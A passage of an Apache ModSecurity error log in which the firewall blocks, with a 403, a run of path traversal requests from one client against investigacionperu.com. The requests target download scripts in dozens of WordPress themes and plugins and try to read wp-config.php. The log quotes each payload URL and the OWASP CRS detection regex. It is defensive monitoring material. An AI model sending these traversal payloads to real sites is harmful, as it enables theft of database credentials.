..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/markant/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "ZN-wY0Wc94tsnIsHAQ-XfgAAAMs"] [Fri Aug 18 12:54:43.836158 2023] [:error] [pid 19445:tid 140103301162752] [client 87.249.132.213:35226] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/yakimabait/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yakimabait/download.php"] [unique_id "ZN-wY0Wc94tsnIsHAQ-XfwAAAM8"] [Fri Aug 18 12:54:43.930748 2023] [:error] [pid 18872:tid 140103267591936] [client 87.249.132.213:35228] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/TheLoft/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/TheLoft/download.php"] [unique_id "ZN-wY_G_rKmCSnA6LxD5gAAAABM"] [Fri Aug 18 12:54:44.041753 2023] [:error] [pid 18872:tid 140103284377344] [client 87.249.132.213:35230] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/felis/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/felis/download.php"] [unique_id "ZN-wZPG_rKmCSnA6LxD5gQAAABE"] [Fri Aug 18 12:54:44.136018 2023] [:error] [pid 18873:tid 140103343126272] [client 87.249.132.213:35232] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "ZN-wZLCcrCl0jrDdhfxXOgAAAEo"] [Fri Aug 18 12:54:44.240217 2023] [:error] [pid 19445:tid 140103474366208] [client 87.249.132.213:35236] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/trinity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinity/lib/scripts/download.php"] [unique_id "ZN-wZEWc94tsnIsHAQ-XgQAAAMM"] [Fri Aug 18 12:54:44.349030 2023] [:error] [pid 19445:tid 140103368304384] [client 87.249.132.213:35238] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/epic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/epic/includes/download.php"] [unique_id "ZN-wZEWc94tsnIsHAQ-XggAAAMc"] [Fri Aug 18 12:54:44.464205 2023] [:error] [pid 19445:tid 140103317948160] [client 87.249.132.213:35240] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/urbancity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/urbancity/lib/scripts/download.php"] [unique_id "ZN-wZEWc94tsnIsHAQ-XgwAAAM0"] [Fri Aug 18 12:54:44.559059 2023] [:error] [pid 19445:tid 140103326340864] [client 87.249.132.213:35242] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/antioch/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/antioch/lib/scripts/download.php"] [unique_id "ZN-wZEWc94tsnIsHAQ-XhAAAAMw"] [Fri Aug 18 12:54:44.686918 2023] [:error] [pid 19445:tid 140103284377344] [client 87.249.132.213:35244] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZN-wZEWc94tsnIsHAQ-XhQAAANE"] [Fri Aug 18 12:54:44.798296 2023] [:error] [pid 19445:tid 140103351518976] [client 87.249.132.213:35246] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/lote27/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/lote27/download.php"] [unique_id "ZN-wZEWc94tsnIsHAQ-XhgAAAMk"] [Fri Aug 18 12:54:44.912632 2023] [:error] [pid 18873:tid 140103250806528] [client 87.249.132.213:35248] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/linenity/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/linenity/functions/download.php"] [unique_id "ZN-wZLCcrCl0jrDdhfxXOwAAAFU"] [Fri Aug 18 12:54:45.007728 2023] [:error] [pid 18872:tid 140103326340864] [client 87.249.132.213:35250] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/medicate/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/medicate/download.php"] [unique_id "ZN-wZfG_rKmCSnA6LxD5ggAAAAw"] [Fri Aug 18 12:54:45.102728 2023] [:error] [pid 18874:tid 140103225628416] [client 87.249.132.213:35252] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cuckootap/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cuckootap/download.php"] [unique_id "ZN-wZVxvK4MFoveIP9_KpgAAAJg"] [Fri Aug 18 12:54:45.215233 2023] [:error] [pid 19445:tid 140103250806528] [client 87.249.132.213:35254] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/IncredibleWP/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/IncredibleWP/download.php"] [unique_id "ZN-wZUWc94tsnIsHAQ-XhwAAANU"] [Fri Aug 18 12:54:45.309556 2023] [:error] [pid 19445:tid 140103376697088] [client 87.249.132.213:35256] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ultimatum/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ultimatum/download.php"] [unique_id "ZN-wZUWc94tsnIsHAQ-XiAAAAMY"] [Fri Aug 18 12:54:45.403989 2023] [:error] [pid 18872:tid 140103259199232] [client 87.249.132.213:35258] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Centum/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Centum/download.php"] [unique_id "ZN-wZfG_rKmCSnA6LxD5gwAAABQ"] [Fri Aug 18 12:54:45.534055 2023] [:error] [pid 18874:tid 140103491151616] [client 87.249.132.213:35260] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Avada/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Avada/download.php"] [unique_id "ZN-wZVxvK4MFoveIP9_KpwAAAIE"] [Fri Aug 18 12:54:45.657212 2023] [:error] [pid 18873:tid 140103234021120] [client 87.249.132.213:35262] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/striking_r/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/striking_r/download.php"] [unique_id "ZN-wZbCcrCl0jrDdhfxXPAAAAFc"] [Fri Aug 18 12:54:45.766086 2023] [:error] [pid 18873:tid 140103499544320] [client 87.249.132.213:35264] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/beach_apollo/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/beach_apollo/download.php"] [unique_id "ZN-wZbCcrCl0jrDdhfxXPQAAAEA"] [Fri Aug 18 12:54:45.862708 2023] [:error] [pid 18873:tid 140103275984640] [client 87.249.132.213:35266] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php"] [unique_id "ZN-wZbCcrCl0jrDdhfxXPgAAAFI"] [Fri Aug 18 12:54:45.960768 2023] [:error] [pid 18873:tid 140103292770048] [client 87.249.132.213:35268] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/newspro2891/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/newspro2891/download.php"] [unique_id "ZN-wZbCcrCl0jrDdhfxXPwAAAFA"] [Fri Aug 18 12:54:46.055359 2023] [:error] [pid 19445:tid 140103234021120] [client 87.249.132.213:35270] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/draisabeladavid/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/draisabeladavid/download.php"] [unique_id "ZN-wZkWc94tsnIsHAQ-XiQAAANc"] [Fri Aug 18 12:54:46.168108 2023] [:error] [pid 19445:tid 140103267591936] [client 87.249.132.213:35272] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match 